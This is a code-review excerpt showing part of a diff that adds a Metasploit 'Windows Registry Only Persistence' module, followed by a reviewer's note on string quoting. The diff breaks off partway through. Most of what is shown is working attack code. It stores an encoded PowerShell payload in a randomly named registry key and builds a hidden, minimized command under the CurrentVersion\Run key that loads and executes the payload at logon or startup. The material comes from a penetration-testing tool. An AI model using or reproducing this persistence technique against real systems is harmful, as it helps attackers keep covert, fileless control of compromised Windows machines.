modules/exploits/windows/local/registry_persistence.rb

```diff
@@ -0,0 +1,192 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/powershell'
+require 'msf/core/post/file'
+
+    class Metasploit4 < Msf::Exploit::Local
+    Rank = ExcellentRanking
+
+    include Msf::Exploit::Powershell
+    include Msf::Post::Windows::Registry
+    include Msf::Post::File
+
+
+    def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Windows Registry Only Persistence',
+      'Description'    => %q{
+        This module will install a payload that is executed during boot.
+        It will be executed either at user logon or system startup via the registry
+        value in "CurrentVersion\Run" (depending on privilege and selected method).
+        The payload will be installed completely in registry.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Donny Maasland <donny.maasland[at]fox-it.com>',
+        ],
+      'Platform'       => [ 'win' ],
+      'SessionTypes'   => [ 'meterpreter' ],
+      'Targets'          =>
+        [
+          [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => "Jul 1 2015",
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => 'true'
+        }
+    ))
+
+    register_options([
+      OptEnum.new('STARTUP',
+        [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]),
+      OptString.new('BLOB_REG_KEY',
+        [false, 'The registry key to use for storing the payload blob. (Default: random)' ]),
+      OptString.new('BLOB_REG_NAME',
+        [false, 'The name to use for storing the payload blob. (Default: random)' ]),
+      OptString.new('RUN_NAME',
+        [false, 'The name to use for the \'Run\' key. (Default: random)' ]),
+      OptEnum.new('TECHNIQUE', [true, 'Execution technique', 'PSH', ['PSH']]), # Just PSH for now, might add others later.
+    ], self.class)
+    end
+
+    def generate_payload_blob
+        if datastore['TECHNIQUE'] == 'PSH'
+            blob = cmd_psh_payload(payload.encoded,payload_instance.arch.first,use_single_quotes: true, encode_final_payload: true).split(' ')[-1]
+        end
+
+        return blob
+    end
+
+    def generate_cmd(root_path, blob_key_name, blob_key_reg)
+        if datastore['TECHNIQUE'] == 'PSH'
+            cmd = "%COMSPEC% /b /c start /b /min powershell -nop -c $y=(Get-Item('#{root_path}:#{blob_key_name}')).GetValue('#{blob_key_reg}'); powershell -nop -e $y" # There might be a better way to do this.
+        end
+        return cmd
+    end
+
+    def generate_blob_reg
+        blob_reg_key = datastore["BLOB_REG_KEY"] || "Software\\#{Rex::Text.rand_text_alphanumeric(8)}"
```

Comment:
For strings that aren't interpolated can we please use single quotes (ie. `'BLOB_REG_KEY'` instead of `"BLOB_REG_KEY"`)